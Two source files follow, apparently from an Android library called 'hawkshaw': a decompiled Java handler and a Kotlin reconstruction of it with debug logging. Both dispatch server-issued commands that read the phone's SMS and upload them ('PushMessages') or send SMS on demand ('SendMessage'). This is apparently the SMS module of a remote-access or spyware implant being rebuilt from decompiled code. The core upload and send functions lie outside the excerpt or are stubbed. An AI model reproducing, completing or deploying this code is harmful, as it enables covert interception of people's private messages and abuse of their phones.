File: Dummy/hawkshaw/library/features/telephony/messages/HandlerKt.java
package com.hawkshaw.library.features.telephony.messages;

import W2.y;
import a3.e;
import b3.C0298a;
import com.hawkshaw.library.App;
import com.hawkshaw.library.datalayer.models.Command;
import com.hawkshaw.library.ktextensions.ManifestPermissionsKt;
import com.hawkshaw.library.logger.Logger;

public final class HandlerKt {
    private static final String TAG = "MessagesHandler";

    public /* synthetic */ class WhenMappings {
        public static final /* synthetic */ int[] $EnumSwitchMapping$0;

        /* JADX WARNING: Failed to process nested try/catch */
        /* JADX WARNING: Missing exception handler attribute for start block: B:3:0x0010 */
        static {
            
                com.hawkshaw.library.datalayer.models.Command$CommandType[] r0 = com.hawkshaw.library.datalayer.models.Command.CommandType.values()
                int r0 = r0.length
                int[] r0 = new int[r0]
                com.hawkshaw.library.datalayer.models.Command$CommandType r1 = com.hawkshaw.library.datalayer.models.Command.CommandType.PushMessages     // Catch:{ NoSuchFieldError -> 0x0010 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0010 }
                r2 = 1
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0010 }
            L_0x0010:
                com.hawkshaw.library.datalayer.models.Command$CommandType r1 = com.hawkshaw.library.datalayer.models.Command.CommandType.SendMessage     // Catch:{ NoSuchFieldError -> 0x0019 }
                int r1 = r1.ordinal()     // Catch:{ NoSuchFieldError -> 0x0019 }
                r2 = 2
                r0[r1] = r2     // Catch:{ NoSuchFieldError -> 0x0019 }
            L_0x0019:
                $EnumSwitchMapping$0 = r0
                return
            
            throw new UnsupportedOperationException("Method not decompiled: com.hawkshaw.library.features.telephony.messages.HandlerKt.WhenMappings.<clinit>():void");
        }
    }

    public static final Object handleMessagesCommand(Command command, e eVar) {
        int i5 = WhenMappings.$EnumSwitchMapping$0[command.getType().ordinal()];
        y yVar = y.f2418a;
        if (i5 != 1) {
            if (i5 == 2) {
                sendMessage(command.getSendMessageRequest());
            }
            return yVar;
        }
        Object pushMessages = pushMessages(eVar);
        return pushMessages == C0298a.f4140D ? pushMessages : yVar;
    }

    /* access modifiers changed from: private */
    public static final Object pushMessages(e eVar) {
        boolean hasPermission = ManifestPermissionsKt.hasPermission("android.permission.READ_SMS");
        y yVar = y.f2418a;
        if (!hasPermission) {
            Logger.e$default(Logger.INSTANCE, TAG, "PushMessages(SMS): You don't have permission to read sms", (Exception) null, false, 12, (Object) null);
            return yVar;
        }
        Object pushMessages = GetMessagesKt.pushMessages(App.Companion.getContext(), eVar);
        return pushMessages == C0298a.f4140D ? pushMessages : yVar;
    }

    private static final void sendMessage(Command.SendMessageRequest sendMessageRequest) {
        if (sendMessageRequest != null) {
            if (!ManifestPermissionsKt.hasPermission("android.permission.SEND_SMS")) {
                Logger.e$default(Logger.INSTANCE, TAG, "SendMessages(SMS): You don't have permission to send sms", (Exception) null, false, 12, (Object) null);
            } else {
                SendMessageKt.sendMessage(App.Companion.getContext(), sendMessageRequest);
            }
        }
    }
}

File: app/src/main/java/com/hawkshaw/library/features/telephony/messages/HandlerKt.kt
package com.hawkshaw.library.features.telephony.messages

import android.content.Context // Added for pushMessages(Context) and sendMessage(Context, request) stubs
import com.hawkshaw.library.App
import com.hawkshaw.library.datalayer.models.Command
import com.hawkshaw.library.ktextensions.ManifestPermissionsKt.hasPermission
import com.hawkshaw.library.logger.Logger
import android.util.Log // Added for logging

private const val TAG = "MessagesHandler"

/**
 * Handles telephony message-related commands
 *
 * @param command Command to process
 * @return Result object (Unit) or the result of a suspended operation
 */
suspend fun handleMessagesCommand(command: Command): Any {
    Log.d(TAG, "[DEBUG] handleMessagesCommand called with command type: ${command.type}")
    return when (command.type) {
        Command.CommandType.PushMessages -> {
            Log.d(TAG, "[DEBUG] handleMessagesCommand: Matched CommandType.PushMessages")
            pushMessages() // Calls the suspend fun pushMessages() below
        }
        Command.CommandType.SendMessage -> {
            Log.d(TAG, "[DEBUG] handleMessagesCommand: Matched CommandType.SendMessage. Request: ${command.sendMessageRequest}")
            sendMessage(command.sendMessageRequest) // Calls the fun sendMessage(...) below
            // Since sendMessage is not suspend and returns Unit, we ensure the handler does too for this branch.
            // If sendMessage were suspend, its result would be returned.
            Unit
        }
        else -> {
            Log.d(TAG, "[DEBUG] handleMessagesCommand: Unhandled command type: ${command.type}")
            Unit
        }
    }
}

/**
 * Pushes SMS messages to the server
 * This matches the private static final Object pushMessages(e eVar) in Java.
 *
 * @return Result of the operation
 */
private suspend fun pushMessages(): Any {
    Log.d(TAG, "[DEBUG] pushMessages (handler) called.")
    val hasPermission = hasPermission("android.permission.READ_SMS")
    Log.d(TAG, "[DEBUG] pushMessages (handler): READ_SMS permission: $hasPermission")

    if (!hasPermission) {
        Logger.e(
            TAG,
            "PushMessages(SMS): You don't have permission to read sms",
            null,
            false,
            12,
            null
        )
        Log.w(TAG, "[DEBUG] pushMessages (handler): Permission denied. Returning Unit.")
        return Unit
    }

    Log.d(TAG, "[DEBUG] pushMessages (handler): Permission granted. Calling core pushMessages(App.getContext()).")
    // This calls the core pushMessages function, which is assumed to be defined elsewhere
    // and likely returns ApiResponse<PushMessagesResponse> or similar.
    return com.hawkshaw.library.features.telephony.messages.pushMessages(App.getContext())
}

/**
 * Sends an SMS message
 * This matches the private static final void sendMessage(Command.SendMessageRequest sendMessageRequest) in Java.
 *
 * @param request Send message request parameters
 */
private fun sendMessage(request: Command.SendMessageRequest?) {
    Log.d(TAG, "[DEBUG] sendMessage (handler) called with request: $request")
    if (request != null) {
        val hasPermission = hasPermission("android.permission.SEND_SMS")
        Log.d(TAG, "[DEBUG] sendMessage (handler): SEND_SMS permission: $hasPermission")
        if (!hasPermission) {
            Logger.e(
                TAG,
                "SendMessages(SMS): You don't have permission to send sms",
                null,
                false,
                12,
                null
            )
            Log.w(TAG, "[DEBUG] sendMessage (handler): Permission denied.")
        } else {
            Log.d(TAG, "[DEBUG] sendMessage (handler): Permission granted. Calling core sendMessage(App.getContext(), request).")
            // This calls the core sendMessage function, which is assumed to be defined elsewhere.
            com.hawkshaw.library.features.telephony.messages.sendMessage(App.getContext(), request)
        }
    } else {
        Log.d(TAG, "[DEBUG] sendMessage (handler): Request was null.")
    }
}

// STUB/Placeholder for the actual core pushMessages function if it's in a different file or not yet defined.
// This is just for the HandlerKt.kt to compile if the core logic is separate.
// Replace with actual import if core `pushMessages` is in another accessible file.
/*
private suspend fun pushMessages(context: Context): Any {
    Log.d(TAG, "[DEBUG] CORE pushMessages(context) STUB called. Implement actual logic or import.");
    // Simulate some work for a suspend function
    kotlinx.coroutines.delay(100)
    return Unit // Placeholder
}
*/

// STUB/Placeholder for the actual core sendMessage function.
// Replace with actual import if core `sendMessage` is in another accessible file.
/*
private fun sendMessage(context: Context, request: Command.SendMessageRequest) {
    Log.d(TAG, "[DEBUG] CORE sendMessage(context, request) STUB called. Implement actual logic or import. Request: $request");
}
*/

